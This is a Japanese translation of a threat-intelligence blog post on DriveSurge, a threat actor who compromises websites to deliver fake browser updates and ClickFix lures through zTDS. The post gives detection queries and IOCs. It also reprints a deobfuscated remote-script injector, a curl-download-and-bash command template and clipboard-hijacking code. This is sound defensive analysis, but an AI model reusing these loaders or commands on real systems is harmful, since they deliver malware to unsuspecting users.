要点
- Silent Pushのアナリストは最近、ある脅威アクターがマルウェアを自動配信するために展開している大々的なドライブバイ攻撃を行うクラスターを複数観測しました。この攻撃ではClickFixとマルウェア「FakeUpdates」の被害が急増しています。当社は首謀者のアクターを「DriveSurge」と名付けました。
- 現在の活動状況から判断すると、DriveSurgeは初期アクセスブローカー(IAB)としての役割に特化しており、ペイパーインストール(Pay-Per-Install、PPI)モデルを使い、下流の脅威アクターに価値の高い被害者情報を提供しているものと思われます。
- DriveSurgeは多くのWebサイトを侵害し、zTDSを使ってClickFix攻撃やFakeUpdates配信を行うWebサイトへ被害者を誘導しています。
- 当社の調査により、DriveSurgeの有害インフラに紐付けられる9つの技術的フィンガープリントが明らかになっています。
本記事は、マキナレコードが提携するSilent Push社のブログ記事『Meet DriveSurge: A New Threat Actor Using ClickFix and Fake Update Drive-By Attacks in Thousands of Compromised Sites』(2026年5月30日付)を翻訳したものです。
こちらのページから、Silent Pushが公開しているその他のブログ記事もご覧いただけます。
概要
攻撃の仕組み
調査方法と初期インテリジェンス
9つのフィンガープリント:DriveSurgeのインフラをマッピング
- フィンガープリント1:有害なインジェクション(t.jsを含むパターン)
- フィンガープリント2:有害なインジェクション(SHA256由来のファイル名)
- フィンガープリント3:有害なインジェクション(ext-bを含むパターン)
- フィンガープリント4:有害なサーバー構成
- フィンガープリント5:ドメイン検索(インフラのパターン)
- フィンガープリント6:WHOIS(登録メールを起点にした調査)
Mozilla Firefoxを含むブラウザ12種の偽アップデート通知
トラフィック配信システム「zTDS」
難読化技術でzTDSを隠ぺい
広告配信システム(ADS)
ペイロードと開発サーバー
概要
DriveSurgeが注目に値するのは、その活動量の多さだけではありません。高度なインフラと幅広い標的に加え、これまでの活動がほとんど検知されていなかったという事実にあります。
DriveSurgeは「トラフィック配信システム(TDS)」と呼ばれる技術を主な武器とし、特にそのオープンソース版として知られるzTDSを使用します。zTDSは遅くとも2015年から使われており、「ztds[.]info」で一般公開されています。DriveSurgeはzTDSを使い、評価の高い正規Webサイトを大量にハイジャックし、サイト所有者や訪問者に気付かれることなく、訪問者をマルウェアに誘導します。
当社の調査に基づくと、DriveSurgeは被害者のデバイスが感染するたびに報酬が支払われるペイパーインストール(PPI)モデルを採用し、感染したデバイスの情報を下流の脅威アクターに販売していると推測されています。
攻撃の仕組み
DriveSurgeの詐欺攻撃は巧妙です。ユーザーは企業、専門サービス会社、または地域団体などの正規Webサイトにアクセスしますが、そのサイトが密かに侵害されています。DriveSurgeが埋め込んだ不正コードはバックグラウンドで実行され、訪問者をzTDSを通じてルーティングを行います。zTDSは訪問者のプロファイルを作成し、次に表示するコンテンツを決定します。
通常、その後は以下のいずれかのシナリオが展開されます。
FakeUpdates:Google ChromeやMozilla Firefox、Microsoft Edge、Safari、Opera Browser、Brave Browser、Yandex Browser、Vivaldi、Samsungブラウザ(旧Samsung Internet)、UC Browser、または「その他」カテゴリーのブラウザアップデートに酷似したプロンプトを表示し、正規の更新ファイルに見せかけたマルウェアをダウンロードするよう仕向けます。
侵害されたサイト「jclforwarding[.]com」を分析した事例の1つでは、有害ドメイン「check[.]first-node[.]rocks」がMozilla Firefoxの偽アップデートページを提供していました。更新ボタンをクリックすると、複数のDLLと「Browser Update[.]exe」を含むZIPファイルがダウンロードされます。
ClickFix:偽のエラーメッセージを表示し、ターミナルまたは PowerShellウィンドウに「修正コマンド」をコピー&ペーストするよう指示します。この「修正コマンド」は、マルウェアをシステムに直接インストールする有害なコマンドです。確認された事例では、ClickFixがIPアドレス「91.92.240[.]127」から不正なコードを取得しようとしていることが観測されました。このアドレスは今回の発見以前に、防弾ホスティングに関する当社の将来侵害指標®(IOFA)としてすでにラベリングされていました。
どちらの手法も、知名度の高いWebサイトや日常的に使うブラウザ、一見普通のセキュリティプロンプトに対する信頼を逆手に取るよう設計されています。
調査方法と初期インテリジェンス
DriveSurgeに関するSilentPushの調査は、当社の防弾ホスティング白書のインテリジェンスを活用することから始まりました。これにより、攻撃者が多用するレジストラとしてNiceNICが特定されています。さらに当社独自のWebリソース技術を使い、NiceNICの登録ドメインが外部からほかのWebサイトに読み込まれている事例を調査した結果、DriveSurgeを含む大規模な脅威クラスターが複数明らかになりました。
SilentPushでは2026年2月、IOFAフィードからNiceNICで登録された全ドメインを収集し、これらのドメインが前月に外部から別のWebサイトに読み込まれたかどうかを確認することで、この手法を検証しました。スクリプトは実行1回につき10万件のドメインを処理し、分析用のWebリソース結果をJSON形式で出力しました。その結果、それぞれ異なる脅威クラスターが少なくとも10件特定されています。
ここからは当社が生成した9つのフィンガープリントをはじめ、追加で行った分析とDriveSurgeクラスターの調査から得た成果について詳述します。
注:特定の防弾ホスティングプロバイダーのASN(自律システム番号)から外部でロードされたドメインを検索することにより、NiceNIC以外で登録されていても同じ手法を適用できます。
9つのフィンガープリント:DriveSurgeのインフラをマッピング
フィンガープリント1:有害なインジェクション(t.jsを含むパターン)
初期のWebリソースデータを分析した結果、特徴的なパターンを持つJavaScriptファイルを挿入している外部リソースを複数発見しました。そのパターンとは、新がされたホスト名に関連して外部から読み込まれたファイル名「t.js」と「site=[32桁の16進数文字列]」から始まるファイルパラメータを指します。
例:hxxps[:]//beacontrace[.]bond/t.js?site=0ca424475803a1cb54908a81a00bd93f
この32桁の16進数文字列は、侵害されたWebサイト特有の識別子と考えられ、盗まれたデータの正確な出自を攻撃者のサーバーに伝えます。この特徴的なURL構造のおかげで、有害なDriveSurgeドメインと侵害されたWebサイトのリストを作成できるようになりました。
Web Search用ファイルパラメータ+ファイル名+外部クエリ:datasource = [“webresources”] AND fileparameter ~= “^site=[0-9a-f]{32}$” AND filename = “t.js” AND external = “true”

ファイルパラメータ+ファイル名+外部クエリによる検索結果
フィンガープリント2:有害なインジェクション(SHA256由来のファイル名)
フィンガープリント1で明らかになったドメインを確認する中で、それらのドメインが別のパターンを使ってJavaScriptファイルを提供していることにも気付きました。ファイル名が「t.」で始まり、12桁の16進数文字列に続いて「.js」で終わるもので、外部から読み込まれます。
この12桁の16進数文字列は、ファイルのSHA256ハッシュにおける最初の12文字と一致していました。これはそれまでに確認されていないファイル命名規則であり、難読化のロジックとして攻撃者が意図的に組み込んだ可能性が示唆されます。当社は調査を拡大し、この固有のシグネチャを使い、関連脅威クラスターをさらに特定できるかどうか確かめています。
Web Search用ファイル名+外部クエリ:datasource = [“webresources”] AND filename ~= “^t\.[a-f0-9]{12}\.js$” AND external = “true”

ファイル名+外部クエリによる検索結果
フィンガープリント3:有害なインジェクション(ext-bを含むパターン)
フィンガープリント1のドメインから、第3のファイルパターンが明らかになりました。ファイル名が「ext-b」または「ext」で始まり、(フィンガープリント2と同じく)ファイルのSHA256の頭12文字に続いて「.js」で終わるもので、外部から読み込まれます。これまでのフィンガープリントと同様、このパターンからも有害なDriveSurgeドメインと被害者サイトのリストがさらに得られました。
Web Search用クエリ:datasource = [“webresources”] AND filename ~= “^ext(-b)?\.[a-f0-9]{12}\.js$” AND external = “true”

クエリによる検索結果
フィンガープリント4:有害なサーバー構成
フィンガープリント1〜3を分析した結果、ファイル名の構造に頼ることなく、有害なサーバー構成を直接特定できるパターンを発見しました。
Web Search用クエリ:datasource = [“webscan”] AND HHV = “809360090d06400845c9ee1802” AND header.server = “nginx/1.27.2” AND jarm = “15d3fd16d29d29d00042d43d000000ea552d307cdd65a9a94fec1293390a04” AND htmltitle = “404 Not Found” AND body_analysis.body_sha256 = [“29ac78c51bcdfe68c64830bdeb6e41437dd55e2691149741c9b78be03b6c82ea”, “a84b032b49773c2318b11b1164d1aada69e940229aedbf8185c33fc7dd1d2cdf”]

クエリによる検索結果
フィンガープリント5:ドメイン検索(インフラのパターン)
フィンガープリント1〜4で得られた有害なDriveSurgeドメインをすべて調査したところ、これらの大部分に共通するインフラ設定パターンが特定されました。
| フィールド | 値 |
| トップレベルドメイン(TLD) | .icu |
| ネームサーバー名 | ns1.erans[.]ru |
| MXレコード | 自己参照 |
| AS番号 | 203273, 210644 |
| レジストラ | NiceNIC |
ドメイン検索機能(エンタープライズ版ユーザーのみ利用可能)を使い、このパターンを組み込んだ検索で90件のホスト名を特定しました。サブドメインを除去した後も重複しないホスト名は39件を数えます。そのうち以下の7件は本稿執筆時点(2026年5月)で不正なインジェクションを送信していないため、インフラが武器化される前に特定・警戒できたものとなります。
- brightson[.]icu
- coverlink[.]icu
- datumprobe[.]icu
- eraggifts[.]icu
- keyview[.]icu
- traceglimpse[.]icu
- tracekey[.]icu
この検索で見つかったその他のドメインは、フィンガープリント1〜3を使った調査でも発見されていました。
フィンガープリント6:WHOIS(登録メールを起点にした調査)
WHOISデータソース内の重複しない不正インジェクション関連ドメイン82件をすべて確認したところ、メールアドレス「thiagorivera197151[@]ycyfugihih[.]cfd」で登録されたドメインがいくつか見つかりました。このメールアドレスを基に作成された新しいフィンガープリントにより、それまで確認されていなかった6件のドメインが特定されました。これらは本稿執筆時点では不正インジェクション用に設定されていないものの、DriveSurgeがいずれ使うであろうドメインの追跡に役立つ可能性があり、特にTTPの変化を検出する際に有用と考えられます。
Web Search用クエリ:datasource = “whois” AND email = “thiagorivera197151@ycyfugihih.cfd”

SilentPushでは、これをDriveSurge専用の登録用メールアドレスとみています。最初のドメインが登録されたのは2026年4月8日で、メールアドレスに含まれるドメイン「ycyfugihih[.]cfd」を起点にした調査により、MXレコードは「tempmail[.]so」に設定されていることが判明しました。tempmail[.]soは使い捨ての一時メールを提供するサービスですが、アカウントを登録すると長期利用可能なメールボックスが用意されます。

このドメインでtempmail[.]soに設定されたMXレコードが明らかに
2週間にわたってこのEメールがドメイン登録に使われていたことから、当社はDriveSurgeが長期アカウントを登録・開設していたと考えています。つまり、「tempmail[.]so」で設定されたメールアドレスがほかにもある可能性を意味します。

使い捨てメールサービスプロバイダー「tempmail[.]so」は長期利用も可能
偽アップデートを配信する侵害されたWebサイトの分析
複数のフィンガープリントから数百もの侵害されたサイトが浮かび上がってきたことを受け、さらに多くのインフラを突き止めるため、侵害されたドメインの1つである「jclforwarding[.]com」を詳しく調査しました。クエリを実行して明らかに正規のものと思われる外部リソースを除外し、不審なドメインのみを抽出しました。
Web Search用クエリ:datasource = [“webresources”] AND external = “true” AND hostname = “jclforwarding.com” AND resource_domain != “google.com” AND resource_domain != “googleapis.com” AND resource_domain != “wsimg.com” AND resource_domain != “gstatic.com” AND datahash = “428bd0b0ac36dfdd223b3953dbe61c0baf227f893310b03e7afe3111462019c6”

クエリによる検索結果
これにより、このサイトに読み込まれる複数の不審なドメインが明らかになりました。その中には既存のフィンガープリント(webgleam[.]info)と一致するものもあれば、さらなる調査を必要するものもありました。
- check[.]first-node[.]rocks
- cptoptious[.]com
- webgleam[.]info
- banerpanel[.]live
- testio[.]ecartdev[.]com
- maxintora[.]com
フィンガープリント7:WHOIS(第2のメールアドレスを起点に追跡)
WHOISデータソース内の新しいドメインを調査したところ、別の脅威アクターのメールアドレスがすぐに浮かび上がってきました。これを新たなフィンガープリントとして使用した結果、さらにいくつもの有害ドメインが明らかになりました。
Web Search用クエリ:datasource = “whois” AND email = [“samuel_jordan16@flixtrend.net”]

Mozilla Firefoxを含むブラウザ12種の偽アップデート通知
「jclforwarding[.]com」でトリガーされたMozilla Firefoxの偽アップデートページは、「check[.]first-node[.]rocks」を介して配信されていました。
更新ボタンをクリックすると、複数のDLLと「Browser Update[.]exe」を含むZIPファイル(SHA256:90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc)のダウンロードが開始されました。

侵害されたサイト上に表示された偽のMozilla Firefoxアップデート通知

ダウンロードされたZIPファイルの中身
「check[.]first-node[.]rocks」によって挿入された「script.js」ファイルを分析した結果、Silent Pushの環境下ではFirefoxの通知に見せかけていたものの、ほかにも11種類のブラウザ(Google Chrome・Mozilla Firefox・Microsoft Edge・Safari・Opera・Brave・Yandexブラウザ・Vivaldi・Samsungブラウザ・UCブラウザ)を装うことができ、さらには「その他」カテゴリーのブラウザにも偽装可能なことが明らかになりました。

有害ドメイン「check[.]first-node[.]rocks」のスクリーンショット
以下のスクリーンショットに示す通り、トリガー可能なサーバーレスポンスからは、同サーバーの主な機能と、有害なホスト名にアクセスしたユーザーに関する主な追跡内容とを読み取ることができます。当該ファイルをダウンロードした上で、これをVirusTotalにアップロードし、以下で共有しました。

「check[.]first-node[.]rocks」のスクリーンショット
トラフィック配信システム「zTDS」
「jcdlforwarding[.]com」にもロードされているドメイン「cptoptious [.]com」は、zTDSのバージョン1.0.3を提供していました。

Live Scan上でドメイン「cptoptious[.]com」を調べた結果
ワードリストを用いてインフラ内をスキャンしたところ、外部からアクセス可能なファイル「changelog.txt」を発見しました。そのファイルによると、このTDSは遅くとも2015年から「ztds[.]info」に存在していることが明らかになりました。

ロシア語で書かれた「ztds[.]info」に関する詳細

ロシア語で書かれた更新履歴のログをGoogle翻訳で英訳し、zTDSの機能を以下にまとめました。
- 「『database/blacklist_asn.dat』を追加し、望まれざるASNをブロック」
- 「『database/blacklist_ip.dat』を追加し、望まれざるIPアドレスをブロック」
- 「『database/signature_ref.dat』を追加し、リファラーによるトラフィックをブロック」
- 「ボットの署名を『database/signature_ua.txt』へ移動」
- 「『ztds[.]info』からボットのIPリストを更新」
- 「TDS管理パネルから『api_v2.php』の設定を変更」
- 「モバイルオペレーターのIPアドレスを1ファイル(wap[.]txt)に統合」
- 「CAPTCHAの設定を『config.php』へ移動」
- 「IPGrabberデータベース(hxxp://bseolized[.]com)で訪問者のIPアドレスを確認」
フィンガープリント8:zTDSのサーバー設定
特定のzTDSの設定からフィンガープリントを取得した結果、脅威アクターが2025年9月13日以降、同じIPアドレスを使っていることが分かりました。とはいえ、防弾ホスティング関連のIOFAとしてラベリングされているため、驚くべき事実ではありません。
Web Search用クエリ:datasource = [“webscan”] AND HHV = “48e9c3576c466132e2080ce519” AND jarm = “15d3fd16d29d29d00042d43d000000fe02290512647416dcf0a400ccbc0b6b” AND header.server = “nginx” AND body_analysis.body_sha256 = “0c62c11e910d7c0d6b6c9800b70e78bfd9220e1f78bd7bb34ae4c3646d05f6e5”

Web Searchで上記のクエリを検索した結果
フィンガープリント9:有害なインジェクション
zTDSを提供するドメインを調査すると、さらなる追跡を可能にする特徴的なパターン、すなわちファイル名が「jsrepo」、ファイルパラメータが「rnd=:」で始まるWebリソースを有していました。
このパターンはRapid7が最近行った研究でも指摘されており、「jsrepo」が有害ドメイン「cptoptious[.]com」と併せて言及されています。
Web Search用クエリ:datasource = [“webresources”] AND filename = “jsrepo” AND fileparameter = “rnd=*”

Web Search上でWebリソースとファイルパラメータのクエリを検索した結果
難読化技術でzTDSを隠ぺい
フィンガープリント8の結果からzTDSの使用例を特定し、侵害されたWebサイトをより詳細に調査しました。このケースでは医療従事者向けの侵害されたサイト(詳細は法執行機関で確認可能)を調べ、ほかに有害なインフラが存在するかどうかを確認しました。当該サイトが侵害されていることは分かっているものの、以下のスクリーンショットに示すように、アクセスしただけでその事実を理解できるわけではありません。
Base64エンコードされた文字列の中に潜むzTDSを見つけるには、さらに深く掘り下げて分析することが必要です。

侵害されたサイト
発見されたJavaScriptスニペットをデコードすると、管理者権限を持たないWordPress訪問者をzTDS経由で狙う、悪意のあるリダイレクトとペイロードインジェクターが明らかになります。これはBase64エンコードをデコードするJavaScriptの組み込み関数「atob()」デコードや、リモートドメインからさらに不正なスクリプトを取得するURLを組み立てるための文字列連結といった難読化技術を使用しています。
コードには複数のバックアップサーバーに順次切り替えるフェイルオーバー機能が実装されており、ペイロードが被害者のブラウザに確実に挿入され、実行されるようになっています。以下に記したコード全文から、このペイロードが「jsrepo」ファイルと共にzTDSを挿入するURLを作成することが分かります。
// 1. Check if it already ran and ensure the user is NOT a WordPress administrator if (!window.__performance_optimizer_v6 && (window.__performance_optimizer_v6 = true, !/wordpress_logged_in_/.test(document.cookie))) { // 2. Encoded malicious zTDS domains var urls = [ “hxxps[://]newtdsone[.]shop”, // index 0 “/jsrepo?rnd=”, // index 1 “hxxps[://]cptoptious[.]com”, // index 2 “/jsrepo?rnd=”, // index 3 “hxxps[://]captioto[.]com” // index 4 ]; // Maps how to combine the strings above var patterns = [[0, 1], [2, 3], [4, 3]]; function loadPayload(index) { if (index >= patterns.length) return; try { var fullUrl = “”; var sequence = patterns[index]; // Build the URL from the array (e.g., hxxps[://]newtdsone[.]shop/jsrepo?rnd=) for (var k = 0; k < sequence.length; k++) { fullUrl += atob(urls[sequence[k]]); } // Append a random number to bypass caching var finalUrl = fullUrl + Math.random(); // 3. Synchronous Request to fetch malicious script var xhr = new XMLHttpRequest(); xhr.open(“GET”, finalUrl, false); // ‘false’ makes it synchronous (freezes the page) xhr.send(); if (xhr.status == 200) { // 4. Injected Execution var scriptElement = document.createElement(“script”); scriptElement.text = xhr.responseText; document.head.appendChild(scriptElement); } else { // If one domain fails, try the next one (Failover) loadPayload(index + 1); } } catch (error) { loadPayload(index + 1); } } loadPayload(0); }
ClickFix
Silent Pushでは調査用の安全なWindows環境の住宅用IPアドレスを使い、zTDSに関するフィンガープリントで見つけた被害者のWebサイトにアクセスし、ClickFixをトリガーさせました。
ClickFixはソーシャルエンジニアリングの手法で、不正アクセスされたWebサイトに偽のブラウザエラーやソフトウェアアップデートエラーを表示させ、ユーザーを騙して有害なコードを実行させます。これらの偽エラーメッセージは通常、被害者に「修正プログラム」をコピーしてターミナルやPowerShellウィンドウに貼り付けるよう指示し、ユーザーのシステムにマルウェアを直接インストールさせます。

IPアドレス「91.92.240[.]127」から有害コードを取得させるClickFix
このClickFixのインスタンスは、IPアドレス「91.92.240[.]127」から有害なコードを取得しようとしました。このアドレスは、すでにIOFAのBulletproof Hostingフィードのリストに挙げられていました。
このIPアドレスが示すサーバーが「内部エラー500」を返したため、さらなる調査は実施できませんでした。しかし、この事例から分かるように、DriveSurgeはClickFixをTTPとして積極的に採用しています。
広告配信システム(ADS)
「jclforwarding[.]com」に外部から読み込まれるドメインを調査中に、「banerpanel[.]live」がカジノのスロットの広告と思わしきものを表示していました。

スロットの広告
「/admin/login[.]php」の「banerpanel[.]live」のログインパネルを開くと、ロシア語のインターフェースで「ADS」システムが表示されます。この名称は「Advertisement Distribution System(広告配信システム)」を略したものと考えられます。

「banerpanel[.]live」のログインページ
このWebリソース内のドメインに絞って調査を進めたところ、別の特徴的なパターンを有する文字列がファイル「banner-js[.]php」を侵害されたサイトにロードしていることに気付きました。
注:現在この文字列を配信しているドメインが「banerpanel[.]live」しかないため、このパターンのフィンガープリントを新たに作成しませんでした。Silent Pushでは、フィンガープリントを増やしても新しい情報を得られない可能性が高いと考えています。
Web Search用クエリ:datasource = [“webresources”] AND resource_domain = “banerpanel.live”

Web Search上で「banerpanel[.]live」を検索した結果
「banner-js[.]php」のスクリプトを調査した結果、これがボットトラフィックを積極的に除外しつつもユーザーに広告を配信する、高度なバナー管理システムであることが分かりました。
この管理システムはデバイスのメタデータ(ディスプレイの解像度やハードウェア情報、ブラウザ環境など)を収集してユニークなフィンガープリントを作成し、人間が操作しているかどうかを判別します。マウスの動きやスクロール、クリックを監視することで「人間かどうか」を得点化し、最初の操作が人間によるものと確認できた場合のみバナーを表示します。
また、このシステムはローカルストレージを介して広告の表示頻度を管理し、繰り返し表示されることを防ぎます。また、行動指標や不正クリック対策用のハッシュなどの詳細なテレメトリデータをリモートAPIに送信し、高精度のコンバージョン追跡と不正クリック防止を実現しています。

「banerpanel[.]live」のスクリーンショット
ペイロードと開発サーバー
「jcdlforwarding[.]com」の分析を通じて、別の疑わしいホスト名「testio[.]ecartdev[.]com」を発見しました。使われていそうなファイルパス名を総当たりし、「/login.php」「/includes」「/assets」ページが存在することを確認しました。
これらを調査した結果、Silent Pushは「testio.ecartdev[.]com」をホストしているマシンがペイロードおよび開発サーバーであると考えています。その根拠を以下に説明します。
パス「/login.php」
「login[.]php」にアクセスすると、下に示したようなログインパネルが表示されました。脅威アクターは一見すると何も表示されていないrootの背後にインデックス化されていないパスを設置し、ログインパネルを隠すことで、コマンド&コントロール(C2)パネルと思われるものを意図的に隠蔽しようとしていました。

パス「/includes」
パス「/includes」の下にもファイル名が見つかりましたが、ファイル自体をダウンロードすることはできませんでした。しかし、これらのファイル名が手がかりになり、JavaScriptファイルを難読化する機能の存在が浮かび上がってきます。侵害されたWebサイトを通じて有害なJavaScriptが挿入される際、難読化が行われているからです。

パス「/assets」
パス「/assets」の下に「/assets/snippets」というフォルダが見つかりました。このフォルダには興味深い名前のファイルとフォルダが含まれており、当該サーバーがマルウェアのペイロードだけでなく、被害者を騙すサーバー上の「.html」フロントページを保存する目的で使用されている可能性が高いことを示しています。

さらに「/assets/snippets」内の「droppers」という名前のフォルダを詳しく調べたところ、同様のファイルを格納するフォルダが追加で5件見つかりました。

以下の画像は「terminal_ps1_downloader」フォルダをさらに詳しく調べ、「content.ps1」スクリプトを確認している様子です。このスクリプトを簡単に調べたところ、被害者のデバイスにマルウェアを仕込むために使用されていることが明らかになりました。

難読化されたペイロードの分析からmacOSマルウェアが浮かび上がる
フィンガープリント3を手がかりにし、「ext-b[12chars].js」のパターンに一致するJavaScriptファイルを見つけました。該当するファイルの1つをさらに分析したところ、高度な難読化が行われていることが判明しました。

Gemini AIによる高度な難読化解除を用いてスクリプトのロジックを解読した結果、巧妙な多段階攻撃手法が明らかになりました。このAI分析を通じ、ペイロードのハードコードされたURLと、macOSシステムを攻撃するために使われた特定の環境チェックパラメータが浮かび上がってきたのです。
環境プロファイリングとフィンガープリンティング
このスクリプトは最初に被害者のオペレーティングシステムを検証し、特にデスクトップ版macOSユーザーを絞り込みます。その際、たとえユーザーエージェントがMacintoshであったとしても、モバイルデバイス(iPadやiPhone)は意図的に除外します。これにより、後から表示されるメッセージ内の「Spotlight」や「ターミナル」といった単語が被害者の使用するOSに合致したものになり、ソーシャルエンジニアリングの成功率が高まります。
const userAgent = navigator.userAgent || ”; const isMac = /\bMacintosh\b/i.test(userAgent); const isMobile = /\b(iPad|iPhone|iPod)\b/i.test(userAgent) || (isMac && navigator.maxTouchPoints > 1); if (!isMac || isMobile) return;
構成と攻撃者エンドポイント
「window」から動的に「analyticsUrl」を取得することで、攻撃者はスクリプトそのものを更新することなく追跡サーバーをローテーションできます。「payloadUrl」は第2段階で配布されるマルウェアの所在を直接示しています。
const analyticsUrl = window.__analyticsUrl; // Injected by a previous loader script const payloadUrl = “hxxp://46.226.166[.]57/ce3cbfc887?force=1”; // The payload server. const maliciousCmd = generateMaliciousCommand(payloadUrl);
有害コマンドの生成
実際のペイロードは「generateMaliciousCommand」関数によって準備され、この関数がリモートスクリプトをダウンロード・実行するための多段階シェルコマンドを作成します。各段階の内容は以下の通りです。
- cd /tmp:ユーザーフォルダにファイルが残らないよう、一時ディレクトリに移動。
- curl -kfsSL:攻撃者のC2サーバーからセカンダリペイロードを密かにダウンロード。
- bash:ダウンロードしたファイルを実行。
- rm -f:デジタルフォレンジックによる分析を回避するため、実行直後にスクリプトを削除。
- 難読化:スクリプトはコマンドをbase64文字列でラップしてあり、ユーザーが確認コードを貼り付けると「検証ID」という文字列が表示されるものの、実はコマンド内のパイプ文字(|)によって復号・実行のためにbashへ送信されている。
let shellCmd = `cd /tmp && curl -kfsSL “${remoteUrl}” -o ${randomFile} && bash ${randomFile} && rm -f ${randomFile}`; let encodedCmd = btoa(unescape(encodeURIComponent(shellCmd))); return `echo ‘I am not a robot – reCAPTCHA Verification ID: ${verificationId}’ | base64 -D | bash`;
クリップボードハイジャッカーのロジック
このスクリプトは、偽の「私はロボットではありません」チェックボックスのクリックを傍受します。セキュリティチェックを実行するのではなく、ユーザーのクリップボードの内容を悪意のあるコマンドに密かに置き換えます。その後、ターミナルを開いて「確認コード」を貼り付ける(⌘+Vを押す)ようユーザーに指示するメッセージが表示されます。しかし、クリップボードが乗っ取られているため、ユーザーは知らず知らずのうちにコマンドをターミナルに貼り付け、マルウェアを実行してしまいます。
checkbox.addEventListener(‘click’, async (e) => { e.preventDefault(); const maliciousCmd = generateMaliciousCommand(payloadUrl); await navigator.clipboard.writeText(maliciousCmd); // Hijack point document.getElementById(‘instruction-modal’).style.display = ‘block’; });
ペイロードハッシュとC2
スクリプトに埋め込まれていたペイロード用のURL「hxxp://46[.]226[.]166[.]57/ce3cbfc887?force=1SHA256」にはSHA256ハッシュ「l7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d」が含まれていました。
さらに、同じペイロードを以前ホストしていた第2のペイロードサーバーをVirusTotalとHybrid Analysisで特定しました。

画像入手元:Hybrid Analysis
この古いペイロードサーバーは現在オフラインになっていますが、特筆すべきことに同じファイルを配信していたサーバーはこれ以外見つかっていません。VirusTotalを使用した調査により、これらの新旧2つのサーバーから配布されたマルウェアサンプルがさらに2つ発見されました。詳細は以下の表に示した通りです。
| macOSマルウェアのURL
| SHA256 |
| hxxp://147[.]45[.]42[.]200/ce3cbfc887?force=1 | 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d |
| hxxp://46[.]226[.]166[.]57/ce3cbfc887?force=1 | 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d |
| hxxp://147[.]45[.]42[.]200/66856ca57ed?force=1 | 8ecc7108cd679316bf5900e84f19b256dc399902cdede646493f502ac872cc1a |
| hxxp://46[.]226[.]166[.]57/66856ca57ed?force=1 | 8ecc7108cd679316bf5900e84f19b256dc399902cdede646493f502ac872cc1a |
| hxxp://147[.]45[.]42[.]200/e97b7f7ccab3a?force=1 | e1ce4e6222396a58d13dddfe64c1dd21f1632bcbe11d1867d44bab4fc646883a |
| hxxp://46[.]226[.]166[.]57/e97b7f7ccab3a?force=1 | e1ce4e6222396a58d13dddfe64c1dd21f1632bcbe11d1867d44bab4fc646883a |
すべてのペイロードは最終的に「147[.]45[.]42[.]205:8133」へのC2接続を確立します。VirusTotalでは、マルウェアが実行されるとそれが明示されます。

VirusTotalでの分析結果
Drive Surgeの追跡を継続
Silent Pushの調査チームは今後もDrive Surgeのインフラの調査と分析を行い、その有害な振る舞いに関する新たな発見を2026年内に公開していきます。
DriveSurgeに関連した活動や、共有すべき情報があれば当社までご連絡ください。
先駆的なサイバー防御への出発点
Silent Pushの先駆的サイバー防御プラットフォームについてさらに詳しく知るには、当社のエキスパートまでお問い合わせください。脅威がネットワーク境界に到達する前に、Silent Pushがどのようにセキュリティチームを支援できるのかをご説明いたします。
また、セキュリティチームの実務担当者や研究者向けに無料コミュニティ版も用意されており、Silent Pushのプラットフォームやデータセットをトライアル感覚でご利用いただけます。
※日本でのSilent Pushに関するお問い合わせは、弊社マキナレコードにて承っております。詳しくは、以下のフォームからお問い合わせください。












